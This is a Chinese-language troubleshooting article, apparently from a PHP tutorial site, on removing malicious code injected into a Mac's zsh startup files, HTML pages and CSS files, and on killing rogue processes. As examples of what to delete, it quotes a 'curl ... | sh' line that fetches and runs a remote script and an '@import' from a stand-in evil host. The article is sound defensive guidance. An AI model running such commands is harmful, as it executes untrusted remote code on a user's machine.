Mac zsh脚本批量注入，CSS规则HTML一网打尽！

首先检查并清除zsh配置文件中的恶意代码，如~/.zshrc中curl自动执行命令；接着搜索HTML文件中被注入的可疑script标签，并用grep与sed批量清理；再排查CSS文件内非法@import远程样式行为；随后通过ps与kill终止恶意进程，检查LaunchAgents启动项；最后重建zsh配置，加固系统安全策略以防止再次感染。

如果您在使用Mac系统时，发现zsh脚本被批量注入恶意代码，并且CSS规则和HTML文件也被篡改或植入异常内容，很可能是系统遭到了自动化脚本攻击。以下是针对此类问题的排查与修复步骤：

一、检查并清除zsh配置文件中的恶意注入

恶意脚本常通过修改用户的shell配置文件实现持久化驻留，需重点检查zsh的启动脚本。

1、打开终端，查看是否存在异常的zsh配置文件：ls -la ~/.zshrc ~/.zprofile ~/.zlogin ~/.zshenv。

2、使用文本编辑器打开~/.zshrc文件，查找包含curl、wget、http等关键字的可疑命令行。

立即学习“前端免费学习笔记（深入）”；

3、定位到类似curl -s http://malicious.site/script.sh | sh的自动执行语句，立即删除整行内容。

4、保存文件后执行source ~/.zshrc重新加载配置，防止重启前再次触发。

二、扫描本地HTML文件中的异常嵌入代码

攻击者可能利用脚本遍历项目目录，在HTML中插入恶意<script>标签或外链资源。</script>

1、进入网站项目根目录，运行命令搜索所有含可疑JS引用的HTML文件：grep -r "<script.*src=.*http" . --include="*.html"。

2、对输出结果逐一检查，确认是否为已知CDN链接；若来源不明，记录文件路径。

3、使用sed工具批量移除特定模式的注入代码，例如：sed -i '' '/malicious-domain.com/d' index.html。

4、对于多个文件，可结合find与sed进行递归清理：find . -name "*.html" -exec sed -i '' "/attacker-script/d" {} \;。

三、审查CSS文件中的非法@import规则

CSS文件可能被注入@import语句以加载远程样式表，用于界面伪造或资源消耗攻击。

1、在终端中执行查找命令：grep -r "@import.*http" ./css/ --include="*.css"，检测异常导入。

腾讯交互翻译

腾讯AI Lab发布的一款AI辅助翻译产品

181

查看详情

2、打开匹配出的CSS文件，删除形如@import url('http://evil.com/style.css');的语句。

3、设置权限锁定重要样式文件，防止再次被写入：chmod 444 style.css。

4、如需恢复原始版本，建议从干净备份中提取对应文件并替换。

四、查找并终止恶意后台进程

某些持久化脚本会在系统启动后运行守护进程，持续监控并重写文件。

1、列出当前活动进程中与网络相关的任务：ps aux | grep -E "(curl|wget|python|node)"。

2、识别运行路径异常或用户名不符的条目，记下其PID编号。

3、使用kill命令强制终止可疑进程：kill -9 PID（将PID替换为实际数字）。

4、检查launchd代理列表是否有未知开机启动项：ls ~/Library/LaunchAgents/。

五、重置终端环境并加固系统安全

完成清理后必须重建可信的命令执行环境，避免残留风险。

1、创建新的zsh配置文件：mv ~/.zshrc ~/.zshrc.bak && touch ~/.zshrc。

2、仅添加必要的环境变量和别名，避免自动执行外部脚本。

3、安装并更新防病毒工具如osquery或KnockKnock，扫描系统潜在后门。

4、启用Gatekeeper和Mandatory Access Control策略，限制未签名脚本运行。

以上就是Mac zsh脚本批量注入，CSS规则HTML一网打尽！的详细内容，更多请关注php中文网其它相关文章！